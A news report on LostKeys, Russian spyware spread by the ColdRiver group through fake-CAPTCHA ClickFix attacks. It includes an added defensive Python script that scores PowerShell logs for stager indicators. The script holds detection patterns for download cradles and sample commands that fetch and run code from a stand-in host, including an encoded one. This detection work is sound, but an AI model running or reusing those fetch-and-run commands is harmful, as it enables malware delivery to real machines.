Google has announced (via Android Headlines) the discovery of new Russian spyware called LostKeys, which is used by the ColdRiver hacker group linked to the Russian Federal Security Service (FSB). The software is designed to steal files and system data from Western organisations.

Details: The Google Threat Intelligence Group (GTIG) reports that LostKeys is used in targeted ClickFix attacks, based on social engineering and beginning with a fake CAPTCHA. Victims are deceived into running malicious PowerShell scripts, allowing additional malware to be downloaded and executed. The primary aim is to install LostKeys, which functions like a digital vacuum cleaner, extracting files, directories and system information. Hackers also deploy other malware, particularly SPICA, to retrieve documents.
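The report describes the ClickFix step only in outline (fake CAPTCHA, then a user-run PowerShell stager that fetches the next payload), so the following added example is a generic defender-side triage of that step and is not code from Google's report. It assumes PowerShell Script Block Logging (Event ID 4104) is enabled, scores each logged script block against indicator families typical of such stagers, and decodes `-EncodedCommand` payloads before matching; the sample log entries are constructed and are not ColdRiver artefacts.

```python
import base64
import re

# Indicator families that recur in ClickFix-style PowerShell stagers:
# download cradle, in-memory execution and evasion switches.
INDICATORS = {
    "download_cradle": r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Start-BitsTransfer",
    "inline_execution": r"\biex\b|Invoke-Expression",
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "policy_bypass": r"-e(?:xecutionpolicy|p)\s+bypass",
    "no_profile": r"-no(?:p|profile)\b",
}
# -EncodedCommand and the abbreviations PowerShell accepts, followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:c|n|nc|ncoded(?:command)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

def decode_encoded_command(text):
    """Return the plaintext of an -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_script_block(text):
    """Score one ScriptBlock entry: (score, matched indicator names, decoded payload or None)."""
    decoded = decode_encoded_command(text)
    haystack = text if decoded is None else text + "\n" + decoded
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, haystack, re.IGNORECASE)]
    if decoded is not None:
        hits.append("encoded_command")
    return len(hits), hits, decoded

def triage(entries, threshold=2):
    """Return (index, score, hits) for entries scoring at or above the threshold."""
    scored = [(i, *score_script_block(e)[:2]) for i, e in enumerate(entries)]
    return [t for t in scored if t[1] >= threshold]

# Constructed sample 4104 ScriptBlock texts (hypothetical, not real indicators).
_ENCODED = base64.b64encode(
    "Invoke-WebRequest -Uri http://example.invalid/p -OutFile $env:TEMP\\p.ps1; & $env:TEMP\\p.ps1".encode("utf-16le")
).decode()
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem -Path C:\\Users\\alice\\Documents",
    "powershell -w hidden -nop -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\"",
    "powershell -EncodedCommand " + _ENCODED,
]
```

A single indicator (for example a plain `Invoke-WebRequest`) is common in legitimate administration, which is why `triage` flags only entries that combine two or more.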

The ColdRiver Group has been active since 2017 and is known by other names such as Star Blizzard and Callisto Group. It has reportedly become more active in recent years, especially since Russia invaded Ukraine. The group specialises in cyber-espionage, targeting government and defence institutions, think tanks, politicians, journalists and non-governmental organisations.

The United States has imposed sanctions on individual group members and announced a US$10 million reward for information leading to their arrest.

Google experts emphasise the need to strengthen cybersecurity, especially for organisations that could become potential victims of ColdRiver attacks. They recommend using Google's advanced protection and regularly updating security systems to counter such threats.

